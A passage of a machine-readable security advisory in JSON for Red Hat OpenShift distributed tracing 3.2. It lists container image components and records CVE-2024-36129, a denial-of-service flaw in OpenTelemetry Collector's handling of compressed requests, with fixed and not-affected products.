"8Base-RHOSDT-3.2:rhosdt/tempo-query-rhel8@sha256:3e730362b9359e071dad1a0decf24a78ad374cc98b9606c16b0f7a6fb3a7bd9b_arm64" }, "product_reference": "rhosdt/tempo-query-rhel8@sha256:3e730362b9359e071dad1a0decf24a78ad374cc98b9606c16b0f7a6fb3a7bd9b_arm64", "relates_to_product_reference": "8Base-RHOSDT-3.2" }, { "category": "default_component_of", "full_product_name": { "name": "rhosdt/tempo-query-rhel8@sha256:455f3b2d5d0609cf76279cfdffd7176cf5427eedd5ec47b9ce8a2981a11e2903_amd64 as a component of Red Hat OpenShift distributed tracing 3.2", "product_id": "8Base-RHOSDT-3.2:rhosdt/tempo-query-rhel8@sha256:455f3b2d5d0609cf76279cfdffd7176cf5427eedd5ec47b9ce8a2981a11e2903_amd64" }, "product_reference": "rhosdt/tempo-query-rhel8@sha256:455f3b2d5d0609cf76279cfdffd7176cf5427eedd5ec47b9ce8a2981a11e2903_amd64", "relates_to_product_reference": "8Base-RHOSDT-3.2" }, { "category": "default_component_of", "full_product_name": { "name": "rhosdt/tempo-query-rhel8@sha256:c6f07167aad12f099535db2ff76ff68ef8fa8420ec9c0ee9e59d338aae056edd_ppc64le as a component of Red Hat OpenShift distributed tracing 3.2", "product_id": "8Base-RHOSDT-3.2:rhosdt/tempo-query-rhel8@sha256:c6f07167aad12f099535db2ff76ff68ef8fa8420ec9c0ee9e59d338aae056edd_ppc64le" }, "product_reference": "rhosdt/tempo-query-rhel8@sha256:c6f07167aad12f099535db2ff76ff68ef8fa8420ec9c0ee9e59d338aae056edd_ppc64le", "relates_to_product_reference": "8Base-RHOSDT-3.2" }, { "category": "default_component_of", "full_product_name": { "name": "rhosdt/tempo-rhel8-operator@sha256:166cab89786ed016d10f325e0f0341e6e09a09cd25aa34876fb45db12b5aa172_amd64 as a component of Red Hat OpenShift distributed tracing 3.2", "product_id": "8Base-RHOSDT-3.2:rhosdt/tempo-rhel8-operator@sha256:166cab89786ed016d10f325e0f0341e6e09a09cd25aa34876fb45db12b5aa172_amd64" }, "product_reference": "rhosdt/tempo-rhel8-operator@sha256:166cab89786ed016d10f325e0f0341e6e09a09cd25aa34876fb45db12b5aa172_amd64", "relates_to_product_reference": "8Base-RHOSDT-3.2" }, { "category": "default_component_of", "full_product_name": { "name": "rhosdt/tempo-rhel8-operator@sha256:2d7af49b7d6c8d04384c476b425fe767b8b6cf822e5a8ebe2e1ed804ea7ca1eb_arm64 as a component of Red Hat OpenShift distributed tracing 3.2", "product_id": "8Base-RHOSDT-3.2:rhosdt/tempo-rhel8-operator@sha256:2d7af49b7d6c8d04384c476b425fe767b8b6cf822e5a8ebe2e1ed804ea7ca1eb_arm64" }, "product_reference": "rhosdt/tempo-rhel8-operator@sha256:2d7af49b7d6c8d04384c476b425fe767b8b6cf822e5a8ebe2e1ed804ea7ca1eb_arm64", "relates_to_product_reference": "8Base-RHOSDT-3.2" }, { "category": "default_component_of", "full_product_name": { "name": "rhosdt/tempo-rhel8-operator@sha256:42a5a38ad4c470350316ab09014b27967d49613f72b01f9590f2558c32ef7125_s390x as a component of Red Hat OpenShift distributed tracing 3.2", "product_id": "8Base-RHOSDT-3.2:rhosdt/tempo-rhel8-operator@sha256:42a5a38ad4c470350316ab09014b27967d49613f72b01f9590f2558c32ef7125_s390x" }, "product_reference": "rhosdt/tempo-rhel8-operator@sha256:42a5a38ad4c470350316ab09014b27967d49613f72b01f9590f2558c32ef7125_s390x", "relates_to_product_reference": "8Base-RHOSDT-3.2" }, { "category": "default_component_of", "full_product_name": { "name": "rhosdt/tempo-rhel8-operator@sha256:f21342c0d9a28a48cba35365807b4740663db1aa9ef0fe36ffc9a759e1864c71_ppc64le as a component of Red Hat OpenShift distributed tracing 3.2", "product_id": "8Base-RHOSDT-3.2:rhosdt/tempo-rhel8-operator@sha256:f21342c0d9a28a48cba35365807b4740663db1aa9ef0fe36ffc9a759e1864c71_ppc64le" }, "product_reference": "rhosdt/tempo-rhel8-operator@sha256:f21342c0d9a28a48cba35365807b4740663db1aa9ef0fe36ffc9a759e1864c71_ppc64le", "relates_to_product_reference": "8Base-RHOSDT-3.2" }, { "category": "default_component_of", "full_product_name": { "name": "rhosdt/tempo-rhel8@sha256:102db0e641f8d461d4ba92f445bdce425afddafddff006250405a3e1c931c2b7_ppc64le as a component of Red Hat OpenShift distributed tracing 3.2", "product_id": "8Base-RHOSDT-3.2:rhosdt/tempo-rhel8@sha256:102db0e641f8d461d4ba92f445bdce425afddafddff006250405a3e1c931c2b7_ppc64le" }, "product_reference": "rhosdt/tempo-rhel8@sha256:102db0e641f8d461d4ba92f445bdce425afddafddff006250405a3e1c931c2b7_ppc64le", "relates_to_product_reference": "8Base-RHOSDT-3.2" }, { "category": "default_component_of", "full_product_name": { "name": "rhosdt/tempo-rhel8@sha256:32a5030b147eb8ad4977c1ba9629ebb3154cf44ea5c2ced8c6f04469d6054f53_s390x as a component of Red Hat OpenShift distributed tracing 3.2", "product_id": "8Base-RHOSDT-3.2:rhosdt/tempo-rhel8@sha256:32a5030b147eb8ad4977c1ba9629ebb3154cf44ea5c2ced8c6f04469d6054f53_s390x" }, "product_reference": "rhosdt/tempo-rhel8@sha256:32a5030b147eb8ad4977c1ba9629ebb3154cf44ea5c2ced8c6f04469d6054f53_s390x", "relates_to_product_reference": "8Base-RHOSDT-3.2" }, { "category": "default_component_of", "full_product_name": { "name": "rhosdt/tempo-rhel8@sha256:396c6fcef9a4ab2627181359746ed68edf20d92f367c96a5f717cfe6517bd203_arm64 as a component of Red Hat OpenShift distributed tracing 3.2", "product_id": "8Base-RHOSDT-3.2:rhosdt/tempo-rhel8@sha256:396c6fcef9a4ab2627181359746ed68edf20d92f367c96a5f717cfe6517bd203_arm64" }, "product_reference": "rhosdt/tempo-rhel8@sha256:396c6fcef9a4ab2627181359746ed68edf20d92f367c96a5f717cfe6517bd203_arm64", "relates_to_product_reference": "8Base-RHOSDT-3.2" }, { "category": "default_component_of", "full_product_name": { "name": "rhosdt/tempo-rhel8@sha256:bbe09630f77833bf75287b5ac987b5cc881e850d5f4f3080799fc07d31b87f47_amd64 as a component of Red Hat OpenShift distributed tracing 3.2", "product_id": "8Base-RHOSDT-3.2:rhosdt/tempo-rhel8@sha256:bbe09630f77833bf75287b5ac987b5cc881e850d5f4f3080799fc07d31b87f47_amd64" }, "product_reference": "rhosdt/tempo-rhel8@sha256:bbe09630f77833bf75287b5ac987b5cc881e850d5f4f3080799fc07d31b87f47_amd64", "relates_to_product_reference": "8Base-RHOSDT-3.2" } ] }, "vulnerabilities": [ { "cve": "CVE-2024-36129", "cwe": { "id": "CWE-119", "name": "Improper Restriction of Operations within the Bounds of a Memory Buffer" }, "discovery_date": "2024-06-11T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "8Base-RHOSDT-3.2:rhosdt/jaeger-agent-rhel8@sha256:03179b679ee33f51d89789a0f0bea6152b00fd7c13da9593e67b706c1e165912_amd64", "8Base-RHOSDT-3.2:rhosdt/jaeger-agent-rhel8@sha256:2b0fb0d6181a0284233669ddb0458122e1fabea6daeae12671b6d1219c8e2bf6_s390x", "8Base-RHOSDT-3.2:rhosdt/jaeger-agent-rhel8@sha256:6d1cb2538155f033909d8e088a013836fc683b61d1769ddd182c77c1263f07c6_ppc64le", "8Base-RHOSDT-3.2:rhosdt/jaeger-agent-rhel8@sha256:fb5aa41f94b0a86abf523c72766ceb65df38c3db9ff38353719d6de0035ffbdc_arm64", "8Base-RHOSDT-3.2:rhosdt/jaeger-all-in-one-rhel8@sha256:245930bb3ab17bf5a5151a425b07e1525ced0c2ae8ff61e2ed5a0166d2a49149_ppc64le", "8Base-RHOSDT-3.2:rhosdt/jaeger-all-in-one-rhel8@sha256:63b9c740262b01dd97edbbacf8e66a0d35187d9b4c3db0f7061569921ba0b435_amd64", "8Base-RHOSDT-3.2:rhosdt/jaeger-all-in-one-rhel8@sha256:7cf6cc990b52b3f6f7c663ac15ae1c090b3fd3c500e1b251f96d9d512a361195_s390x", "8Base-RHOSDT-3.2:rhosdt/jaeger-all-in-one-rhel8@sha256:a1831d0a89dd43cc3ff609c668ba56e6ef1c9aa0b4e2415d77e8b669eb22dfac_arm64", "8Base-RHOSDT-3.2:rhosdt/jaeger-collector-rhel8@sha256:095ec17767d98a372ddf88a27d896f0eeb26bf29da61e520000ffebac011a268_amd64", "8Base-RHOSDT-3.2:rhosdt/jaeger-collector-rhel8@sha256:16a6dca76a733d75d6e3de4db552890905e0106eae66a6e9ae4031eb5bb2e357_arm64", "8Base-RHOSDT-3.2:rhosdt/jaeger-collector-rhel8@sha256:1b6dde7d4c3bc0227f4e8077bba21c948901304288b2b42238bce28951bf777c_s390x", "8Base-RHOSDT-3.2:rhosdt/jaeger-collector-rhel8@sha256:3ec93fd310c2e4c03fa5193e655f67004ddaf465f9154e76a8a95ed754e65976_ppc64le", "8Base-RHOSDT-3.2:rhosdt/jaeger-es-index-cleaner-rhel8@sha256:0257eb8ad7159b1e4eebdfd522f21496074266acea5cb16b01e68eabd6164dbc_ppc64le", "8Base-RHOSDT-3.2:rhosdt/jaeger-es-index-cleaner-rhel8@sha256:44da069d5aab2a8fb632a862a5ae327fe580ae97c1dadaced1fdb2980af532cf_amd64", "8Base-RHOSDT-3.2:rhosdt/jaeger-es-index-cleaner-rhel8@sha256:c8879a96b034635bde298cc86f4b3d6192a39dc7906bea49865c779ae4369426_arm64", "8Base-RHOSDT-3.2:rhosdt/jaeger-es-index-cleaner-rhel8@sha256:cdaed1cbb883cec0b785211f4eeb3dd119cdeaf33366af1e677c28cced056753_s390x", "8Base-RHOSDT-3.2:rhosdt/jaeger-es-rollover-rhel8@sha256:3ca28d2ba4d5a365f1acd40963f613c3d1bb42d07b8a73f054509719761f9fa5_ppc64le", "8Base-RHOSDT-3.2:rhosdt/jaeger-es-rollover-rhel8@sha256:4e23527d2c65bfd655e8060ebd05d58282ffc3b4b91bcdbb48fbcca90977bbf3_s390x", "8Base-RHOSDT-3.2:rhosdt/jaeger-es-rollover-rhel8@sha256:7932a2d60ada2a669b2ad4f5d3f0c956cdb4aca1cfd8116963211668cf324f95_arm64", "8Base-RHOSDT-3.2:rhosdt/jaeger-es-rollover-rhel8@sha256:c56cad5b9076e0ff01a0515e87f8b2b6b44c13e525c46a9dc0bf9741b2437597_amd64", "8Base-RHOSDT-3.2:rhosdt/jaeger-ingester-rhel8@sha256:616fba7c8ff784ee349c3c4fe2dc2cacf48246bd89b41b90e26a153a8ca0e195_ppc64le", "8Base-RHOSDT-3.2:rhosdt/jaeger-ingester-rhel8@sha256:62267a1d851853a04e6bdc994f9e2dd2c5c9da8fedff611182df27ef34bab37f_amd64", "8Base-RHOSDT-3.2:rhosdt/jaeger-ingester-rhel8@sha256:794104cf40a505d0244ac3c2d23d19785d29b1fca882d0354fd129320abf093c_arm64", "8Base-RHOSDT-3.2:rhosdt/jaeger-ingester-rhel8@sha256:9eecdd0f48eaf7a6aded05bf504c82a4e89b5da8ed84d1fa12c322bf676fa5a0_s390x", "8Base-RHOSDT-3.2:rhosdt/jaeger-operator-bundle@sha256:3048dd6953414dfbcaba2934785d2e5774acc9507f34ac3509a1a410b0c07f76_amd64", "8Base-RHOSDT-3.2:rhosdt/jaeger-operator-bundle@sha256:48b673f1569e69ee1c4ce4893b65ef4befb9d04d678f5e616618b9b6595ac917_ppc64le", "8Base-RHOSDT-3.2:rhosdt/jaeger-operator-bundle@sha256:bc6a22b1774aea035aed393d404324568c392f6aba2deb62bfbad2e7aec408d7_s390x", "8Base-RHOSDT-3.2:rhosdt/jaeger-operator-bundle@sha256:ee9e1acac032d61486a76d4d36183f5dac1e3e9c826016930a1ad4ed59f4cee7_arm64", "8Base-RHOSDT-3.2:rhosdt/jaeger-query-rhel8@sha256:7d9396c71cc6142f99bade287b2aef619a29579f645bd333c2b229f6911ddead_ppc64le", "8Base-RHOSDT-3.2:rhosdt/jaeger-query-rhel8@sha256:abe2247da478226cf7a40cc8623f91410fed282487a6dab9f1c98170d1383969_s390x", "8Base-RHOSDT-3.2:rhosdt/jaeger-query-rhel8@sha256:bfe11588f58a920e4117c06a407d142a985318f2b746cb97237c73ac3d3f7e19_amd64", "8Base-RHOSDT-3.2:rhosdt/jaeger-query-rhel8@sha256:c7bf1f061c319d8ff3701dfa756d33d63a01496ba6526363177c6746f508c4c6_arm64", "8Base-RHOSDT-3.2:rhosdt/jaeger-rhel8-operator@sha256:4b01965dc2786373d46e43773453c3fa182592621d06f6e6d9001b8e53b6b844_arm64", "8Base-RHOSDT-3.2:rhosdt/jaeger-rhel8-operator@sha256:4b62e3078383fb995d4acfa70309efa51992abb41b50c088f1cbc38c5986d202_ppc64le", "8Base-RHOSDT-3.2:rhosdt/jaeger-rhel8-operator@sha256:c7312ab3bf2d911cb4acb29989f19a87c2c0ad19d5325c343685e32e3f346d0e_amd64", "8Base-RHOSDT-3.2:rhosdt/jaeger-rhel8-operator@sha256:c7fa52b1935d7e1cc6a6274c56b5df1d0ae2ff9fd95901a7e15847dc654dc60e_s390x", "8Base-RHOSDT-3.2:rhosdt/opentelemetry-operator-bundle@sha256:3c53d78d1aaca0166e8b13d1e98cf983ebbe70ca9fe4ca9ec187ee89ff16f869_amd64", "8Base-RHOSDT-3.2:rhosdt/opentelemetry-operator-bundle@sha256:6a0971b0ad235831c7c04cefad16cec6ff0ddd22195e55583bb3cc480d400ef9_ppc64le", "8Base-RHOSDT-3.2:rhosdt/opentelemetry-operator-bundle@sha256:8a3afe2eb60314df03171f9b9c811bc118387b4e54d4eb5f168cbb7193c4e8c3_s390x", "8Base-RHOSDT-3.2:rhosdt/opentelemetry-operator-bundle@sha256:c90e55c89cbd1e696c4d1a42d67a0a14d2e43fb99de00acac2d57bf69c1dfbdb_arm64", "8Base-RHOSDT-3.2:rhosdt/opentelemetry-rhel8-operator@sha256:0524a96e07b6d432c041b801e9cd7926837e6fef46af42afa4bb0288aef24df4_ppc64le", "8Base-RHOSDT-3.2:rhosdt/opentelemetry-rhel8-operator@sha256:25cb32d32c776c3ca5cf3567a9fb8809f3f12e3cb551d06fbeeeb0d668d759e0_amd64", "8Base-RHOSDT-3.2:rhosdt/opentelemetry-rhel8-operator@sha256:2780f2fff1be43eddccac091ffb55056121059739a98d0255f1459923cdccf23_arm64", "8Base-RHOSDT-3.2:rhosdt/opentelemetry-rhel8-operator@sha256:82e351c3b7b32b62501a5a5ab56dc4e312b3d043b27570a06edd63fd89769328_s390x", "8Base-RHOSDT-3.2:rhosdt/opentelemetry-target-allocator-rhel8@sha256:1220a6e721cabeb55ea2f879283e325be34dbd509d041a0cb5d85e73709417cd_ppc64le", "8Base-RHOSDT-3.2:rhosdt/opentelemetry-target-allocator-rhel8@sha256:878f66261440d7c062577774ebd00364ca51f3ad3fea07b6119c55e128f17625_s390x", "8Base-RHOSDT-3.2:rhosdt/opentelemetry-target-allocator-rhel8@sha256:9944e14192b97132915df21fe46bf29f77560aee35f142c8e51bbf8119f778de_arm64", "8Base-RHOSDT-3.2:rhosdt/opentelemetry-target-allocator-rhel8@sha256:a9a3bb1cbf169a65d2910333278cbd05e16b4268089d75c693f5c7480f0b24fb_amd64", "8Base-RHOSDT-3.2:rhosdt/tempo-gateway-opa-rhel8@sha256:2325a00807cd98e34ad666d5a6e193ca94899fdb9acd84852ea9971b777c163f_ppc64le", "8Base-RHOSDT-3.2:rhosdt/tempo-gateway-opa-rhel8@sha256:36d6a823617c710af0bdde056a0518aa517aca74ff58978377aba18f58b812a0_s390x", "8Base-RHOSDT-3.2:rhosdt/tempo-gateway-opa-rhel8@sha256:3f054329885fac3d2aa00ba43e30540595a3a3521154df22f3c51995f38ee2b0_amd64", "8Base-RHOSDT-3.2:rhosdt/tempo-gateway-opa-rhel8@sha256:fd3f7625fee23cd081884349ed632762cff480b2d76942e059dc93fbe4ddedf2_arm64", "8Base-RHOSDT-3.2:rhosdt/tempo-gateway-rhel8@sha256:9518da59837ff3b7472cfaccfd6664672e3a053a227f119a051cda0570c9e653_arm64", "8Base-RHOSDT-3.2:rhosdt/tempo-gateway-rhel8@sha256:a0421a538015440c2d6799be7f691ac98ddbe47216f3486a88c0e82c115f9a6a_s390x", "8Base-RHOSDT-3.2:rhosdt/tempo-gateway-rhel8@sha256:a772a420a6a5a70baf1058c35b255b87cee307d7ae79f4bf72829b55f33338cf_ppc64le", "8Base-RHOSDT-3.2:rhosdt/tempo-gateway-rhel8@sha256:d04dc1a142258e8c7455d5c59157bd293f78ee7bb673a3783d23a7474b408394_amd64", "8Base-RHOSDT-3.2:rhosdt/tempo-operator-bundle@sha256:009d39b8894627b0be013239e842776dcdb8a26aa5c63aab005772ed68d2f46c_s390x", "8Base-RHOSDT-3.2:rhosdt/tempo-operator-bundle@sha256:2a395cc7eb2c67cdee59ecedb6c8497833fb14877c996e8d34f3555cd14ad7f7_ppc64le", "8Base-RHOSDT-3.2:rhosdt/tempo-operator-bundle@sha256:57cbaada2dce7abcabaf94d441e07d77126a60726adbb829808e157f9d0897cb_amd64", "8Base-RHOSDT-3.2:rhosdt/tempo-operator-bundle@sha256:7bbe7e744b4b7ad53375f02615fcb33b9980d65ed75b5c29688f1bd5accefaa3_arm64", "8Base-RHOSDT-3.2:rhosdt/tempo-query-rhel8@sha256:010d235813b78bc6c22ffd8d33bc5f77ad1a938213d77423cb52e7ba765723a5_s390x", "8Base-RHOSDT-3.2:rhosdt/tempo-query-rhel8@sha256:3e730362b9359e071dad1a0decf24a78ad374cc98b9606c16b0f7a6fb3a7bd9b_arm64", "8Base-RHOSDT-3.2:rhosdt/tempo-query-rhel8@sha256:455f3b2d5d0609cf76279cfdffd7176cf5427eedd5ec47b9ce8a2981a11e2903_amd64", "8Base-RHOSDT-3.2:rhosdt/tempo-query-rhel8@sha256:c6f07167aad12f099535db2ff76ff68ef8fa8420ec9c0ee9e59d338aae056edd_ppc64le", "8Base-RHOSDT-3.2:rhosdt/tempo-rhel8-operator@sha256:166cab89786ed016d10f325e0f0341e6e09a09cd25aa34876fb45db12b5aa172_amd64", "8Base-RHOSDT-3.2:rhosdt/tempo-rhel8-operator@sha256:2d7af49b7d6c8d04384c476b425fe767b8b6cf822e5a8ebe2e1ed804ea7ca1eb_arm64", "8Base-RHOSDT-3.2:rhosdt/tempo-rhel8-operator@sha256:42a5a38ad4c470350316ab09014b27967d49613f72b01f9590f2558c32ef7125_s390x", "8Base-RHOSDT-3.2:rhosdt/tempo-rhel8-operator@sha256:f21342c0d9a28a48cba35365807b4740663db1aa9ef0fe36ffc9a759e1864c71_ppc64le", "8Base-RHOSDT-3.2:rhosdt/tempo-rhel8@sha256:102db0e641f8d461d4ba92f445bdce425afddafddff006250405a3e1c931c2b7_ppc64le", "8Base-RHOSDT-3.2:rhosdt/tempo-rhel8@sha256:32a5030b147eb8ad4977c1ba9629ebb3154cf44ea5c2ced8c6f04469d6054f53_s390x", "8Base-RHOSDT-3.2:rhosdt/tempo-rhel8@sha256:396c6fcef9a4ab2627181359746ed68edf20d92f367c96a5f717cfe6517bd203_arm64", "8Base-RHOSDT-3.2:rhosdt/tempo-rhel8@sha256:bbe09630f77833bf75287b5ac987b5cc881e850d5f4f3080799fc07d31b87f47_amd64" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2291337" } ], "notes": [ { "category": "description", "text": "A flaw was found in OpenTelemetry Collector. When sending an HTTP or gRPC request with a compressed payload, the Collector only verifies whether the compressed payload is beyond a certain limit but not its uncompressed version. This flaw allows an attacker using a specially crafted HTTP or gRPC request to trigger a denial of service.", "title": "Vulnerability description" }, { "category": "summary", "text": "opentelemetry-collector: denial of service via specially crafted HTTP or gRPC request", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-RHOSDT-3.2:rhosdt/opentelemetry-collector-rhel8@sha256:0129388735cff9712b1c8cae7cbc0caaed94dbad9b8c9789de9789f58f484f8e_s390x", "8Base-RHOSDT-3.2:rhosdt/opentelemetry-collector-rhel8@sha256:cd453aeddf5014a3b91d22f440847672fc58242617f82a64aa6e668d10cf5949_arm64", "8Base-RHOSDT-3.2:rhosdt/opentelemetry-collector-rhel8@sha256:ebadded6eb776515178cb85a024613ec873fbeb52a66e4176c582ed5443f960d_amd64", "8Base-RHOSDT-3.2:rhosdt/opentelemetry-collector-rhel8@sha256:ebb07388cfd4d8cb534e3903038e73bc927400bb066343ad0704eda0c63fa9ec_ppc64le" ], "known_not_affected": [ "8Base-RHOSDT-3.2:rhosdt/jaeger-agent-rhel8@sha256:03179b679ee33f51d89789a0f0bea6152b00fd7c13da9593e67b706c1e165912_amd64", "8Base-RHOSDT-3.2:rhosdt/jaeger-agent-rhel8@sha256:2b0fb0d6181a0284233669ddb0458122e1fabea6daeae12671b6d1219c8e2bf6_s390x", "8Base-RHOSDT-3.2:rhosdt/jaeger-agent-rhel8@sha256:6d1cb2538155f033909d8e088a013836fc683b61d1769ddd182c77c1263f07c6_ppc64le", "8Base-RHOSDT-3.2:rhosdt/jaeger-agent-rhel8@sha256:fb5aa41f94b0a86abf523c72766ceb65df38c3db9ff38353719d6de0035ffbdc_arm64", "8Base-RHOSDT-3.2:rhosdt/jaeger-all-in-one-rhel8@sha256:245930bb3ab17bf5a5151a425b07e1525ced0c2ae8ff61e2ed5a0166d2a49149_ppc64le", "8Base-RHOSDT-3.2:rhosdt/jaeger-all-in-one-rhel8@sha256:63b9c740262b01dd97edbbacf8e66a0d35187d9b4c3db0f7061569921ba0b435_amd64", "8Base-RHOSDT-3.2:rhosdt/jaeger-all-in-one-rhel8@sha256:7cf6cc990b52b3f6f7c663ac15ae1c090b3fd3c500e1b251f96d9d512a361195_s390x", "8Base-RHOSDT-3.2:rhosdt/jaeger-all-in-one-rhel8@sha256:a1831d0a89dd43cc3ff609c668ba56e6ef1c9aa0b4e2415d77e8b669eb22dfac_arm64", "8Base-RHOSDT-3.2:rhosdt/jaeger-collector-rhel8@sha256:095ec17767d98a372ddf88a27d896f0eeb26bf29da61e520000ffebac011a268_amd64", "8Base-RHOSDT-3.2:rhosdt/jaeger-collector-rhel8@sha256:16a6dca76a733d75d6e3de4db552890905e0106eae66a6e9ae4031eb5bb2e357_arm64", "8Base-RHOSDT-3.2:rhosdt/jaeger-collector-rhel8@sha256:1b6dde7d4c3bc0227f4e8077bba21c948901304288b2b42238bce28951bf777c_s390x", "8Base-RHOSDT-3.2:rhosdt/jaeger-collector-rhel8@sha256:3ec93fd310c2e4c03fa5193e655f67004ddaf465f9154e76a8a95ed754e65976_ppc64le", "8Base-RHOSDT-3.2:rhosdt/jaeger-es-index-cleaner-rhel8@sha256:0257eb8ad7159b1e4eebdfd522f21496074266acea5cb16b01e68eabd6164dbc_ppc64le", "8Base-RHOSDT-3.2:rhosdt/jaeger-es-index-cleaner-rhel8@sha256:44da069d5aab2a8fb632a862a5ae327fe580ae97c1dadaced1fdb2980af532cf_amd64", "8Base-RHOSDT-3.2:rhosdt/jaeger-es-index-cleaner-rhel8@sha256:c8879a96b034635bde298cc86f4b3d6192a39dc7906bea49865c779ae4369426_arm64", "8Base-RHOSDT-3.2:rhosdt/jaeger-es-index-cleaner-rhel8@sha256:cdaed1cbb883cec0b785211f4eeb3dd119cdeaf33366af1e677c28cced056753_s390x", "8Base-RHOSDT-3.2:rhosdt/jaeger-es-rollover-rhel8@sha256:3ca28d2ba4d5a365f1acd40963f613c3d1bb42d07b8a73f054509719761f9fa5_ppc64le", "8Base-RHOSDT-3.2:rhosdt/jaeger-es-rollover-rhel8@sha256:4e23527d2c65bfd655e8060ebd05d58282ffc3b4b91bcdbb48fbcca90977bbf3_s390x", "8Base-RHOSDT-3.2:rhosdt/jaeger-es-rollover-rhel8@sha256:7932a2d60ada2a669b2ad4f5d3f0c956cdb4aca1cfd8116963211668cf324f95_arm64", "8Base-RHOSDT-3.2:rhosdt/jaeger-es-rollover-rhel8@sha256:c56cad5b9076e0ff01a0515e87f8b2b6b44c13e525c46a9dc0bf9741b2437597_amd64", "8Base-RHOSDT-3.2:rhosdt/jaeger-ingester-rhel8@sha256:616fba7c8ff784ee349c3c4fe2dc2cacf48246bd89b41b90e26a153a8ca0e195_ppc64le", "8Base-RHOSDT-3.2:rhosdt/jaeger-ingester-rhel8@sha256:62267a1d851853a04e6bdc994f9e2dd2c5c9da8fedff611182df27ef34bab37f_amd64", "8Base-RHOSDT-3.2:rhosdt/jaeger-ingester-rhel8@sha256:794104cf40a505d0244ac3c2d23d19785d29b1fca882d0354fd129320abf093c_arm64", "8Base-RHOSDT-3.2:rhosdt/jaeger-ingester-rhel8@sha256:9eecdd0f48eaf7a6aded05bf504c82a4e89b5da8ed84d1fa12c322bf676fa5a0_s390x", "8Base-RHOSDT-3.2:rhosdt/jaeger-operator-bundle@sha256:3048dd6953414dfbcaba2934785d2e5774acc9507f34ac3509a1a410b0c07f76_amd64", "8Base-RHOSDT-3.2:rhosdt/jaeger-operator-bundle@sha256:48b673f1569e69ee1c4ce4893b65ef4befb9d04d678f5e616618b9b6595ac917_ppc64le", "8Base-RHOSDT-3.2:rhosdt/jaeger-operator-bundle@sha256:bc6a22b1774aea035aed393d404324568c392f6aba2deb62bfbad2e7aec408d7_s390x", "8Base-RHOSDT-3.2:rhosdt/jaeger-operator-bundle@sha256:ee9e1acac032d61486a76d4d36183f5dac1e3e9c826016930a1ad4ed59f4cee7_arm64", "8Base-RHOSDT-3.2:rhosdt/jaeger-query-rhel8@sha256:7d9396c71cc6142f99bade287b2aef619a29579f645bd333c2b229f6911ddead_ppc64le", "8Base-RHOSDT-3.2:rhosdt/jaeger-query-rhel8@sha256:abe2247da478226cf7a40cc8623f91410fed282487a6dab9f1c98170d1383969_s390x", "8Base-RHOSDT-3.2:rhosdt/jaeger-query-rhel8@sha256:bfe11588f58a920e4117c06a407d142a985318f2b746cb97237c73ac3d3f7e19_amd64", "8Base-RHOSDT-3.2:rhosdt/jaeger-query-rhel8@sha256:c7bf1f061c319d8ff3701dfa756d33d63a01496ba6526363177c6746f508c4c6_arm64", "8Base-RHOSDT-3.2:rhosdt/jaeger-rhel8-operator@sha256:4b01965dc2786373d46e43773453c3fa182592621d06f6e6d9001b8e53b6b844_arm64", "8Base-RHOSDT-3.2:rhosdt/jaeger-rhel8-operator@sha256:4b62e3078383fb995d4acfa70309efa51992abb41b50c088f1cbc38c5986d202_ppc64le", "8Base-RHOSDT-3.2:rhosdt/jaeger-rhel8-operator@sha256:c7312ab3bf2d911cb4acb29989f19a87c2c0ad19d5325c343685e32e3f346d0e_amd64", "8Base-RHOSDT-3.2:rhosdt/jaeger-rhel8-operator@sha256:c7fa52b1935d7e1cc6a6274c56b5df1d0ae2ff9fd95901a7e15847dc654dc60e_s390x", "8Base-RHOSDT-3.2:rhosdt/opentelemetry-operator-bundle@sha256:3c53d78d1aaca0166e8b13d1e98cf983ebbe70ca9fe4ca9ec187ee89ff16f869_amd64", "8Base-RHOSDT-3.2:rhosdt/opentelemetry-operator-bundle@sha256:6a0971b0ad235831c7c04cefad16cec6ff0ddd22195e55583bb3cc480d400ef9_ppc64le", "8Base-RHOSDT-3.2:rhosdt/opentelemetry-operator-bundle@sha256:8a3afe2eb60314df03171f9b9c811bc118387b4e54d4eb5f168cbb7193c4e8c3_s390x", "8Base-RHOSDT-3.2:rhosdt/opentelemetry-operator-bundle@sha256:c90e55c89cbd1e696c4d1a42d67a0a14d2e43fb99de00acac2d57bf69c1dfbdb_arm64", "8Base-RHOSDT-3.2:rhosdt/opentelemetry-rhel8-operator@sha256:0524a96e07b6d432c041b801e9cd7926837e6fef46af42afa4bb0288aef24df4_ppc64le", "8Base-RHOSDT-3.2:rhosdt/opentelemetry-rhel8-operator@sha256:25cb32d32c776c3ca5cf3567a9fb8809f3f12e3cb551d06fbeeeb0d668d759e0_amd64", "8Base-RHOSDT-3.2:rhosdt/opentelemetry-rhel8-operator@sha256:2780f2fff1be43eddccac091ffb55056121059739a98d0255f1459923cdccf23_arm64", "8Base-RHOSDT-3.2:rhosdt/opentelemetry-rhel8-operator@sha256:82e351c3b7b32b62501a5a5ab56dc4e312b3d043b27570a06edd63fd89769328_s390x", "8Base-RHOSDT-3.2:rhosdt/opentelemetry-target-allocator-rhel8@sha256:1220a6e721cabeb55ea2f879283e325be34dbd509d041a0cb5d85e73709417cd_ppc64le", "8Base-RHOSDT-3.2:rhosdt/opentelemetry-target-allocator-rhel8@sha256:878f66261440d7c062577774ebd00364ca51f3ad3fea07b6119c55e128f17625_s390x", "8Base-RHOSDT-3.2:rhosdt/opentelemetry-target-allocator-rhel8@sha256:9944e14192b97132915df21fe46bf29f77560aee35f142c8e51bbf8119f778de_arm64", "8Base-RHOSDT-3.2:rhosdt/opentelemetry-target-allocator-rhel8@sha256:a9a3bb1cbf169a65d2910333278cbd05e16b4268089d75c693f5c7480f0b24fb_amd64", "8Base-RHOSDT-3.2:rhosdt/tempo-gateway-opa-rhel8@sha256:2325a00807cd98e34ad666d5a6e193ca94899fdb9acd84852ea9971b777c163f_ppc64le", "8Base-RHOSDT-3.2:rhosdt/tempo-gateway-opa-rhel8@sha256:36d6a823617c710af0bdde056a0518aa517aca74ff58978377aba18f58b812a0_s390x", "8Base-RHOSDT-3.2:rhosdt/tempo-gateway-opa-rhel8@sha256:3f054329885fac3d2aa00ba43e30540595a3a3521154df22f3c51995f38ee2b0_amd64", "8Base-RHOSDT-3.2:rhosdt/tempo-gateway-opa-rhel8@sha256:fd3f7625fee23cd081884349ed632762cff480b2d76942e059dc93fbe4ddedf2_arm64", 